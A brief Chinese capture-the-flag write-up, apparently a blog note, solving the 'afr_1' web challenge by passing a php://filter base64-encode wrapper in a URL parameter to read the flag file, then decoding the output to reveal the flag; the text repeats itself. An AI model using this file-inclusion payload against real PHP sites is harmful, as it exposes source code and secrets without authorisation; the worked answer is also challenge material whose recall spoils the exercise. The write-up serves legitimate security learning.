解题过程:
php伪协议读取flag
?p=php://filter/read=convert.base64-encode/resource=flag
得到
PD9waHAKZGIlKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
进行base64解码
<?php
db%(\'no no no\');
//n1book{afr_1_solved}
所以flag为n1book{afr_1_solved
THE END
![[第一章 web入门]afr_1 – buu刷题笔记,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/10/hack1.jpg)
php伪协议读取flag
?p=php://filter/read=convert.base64-encode/resource=flag
得到
PD9waHAKZGIlKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
进行base64解码
<?php
db%(\'no no no\');
//n1book{afr_1_solved}
所以flag为n1book{afr_1_solved
暂无评论内容